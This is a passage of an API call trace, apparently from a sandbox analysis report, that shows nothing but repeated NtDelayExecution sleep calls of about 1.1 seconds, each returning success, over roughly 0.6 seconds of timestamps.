(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.282] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.296] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.339] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.342] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.349] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.367] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.376] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.383] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.428] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.430] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.431] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.494] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.507] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.511] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.514] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.567] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.573] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.590] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.596] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.602] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.603] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.606] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.608] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.625] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.633] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.643] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.675] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.678] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.699] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.700] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.702] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.703] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.704] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.706] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.707] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.709] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.711] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.712] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.713] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.724] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.726] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.729] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.731] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.732] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.735] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.744] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.747] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.748] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.754] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.756] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.757] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.760] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.771] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.775] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.777] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.780] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.790] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.791] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.793] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.794] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.796] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.800] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.805] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.812] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.827] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.830] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.833] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.837] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.858] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.870] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.873] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.875] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.892] NtDelayExecution 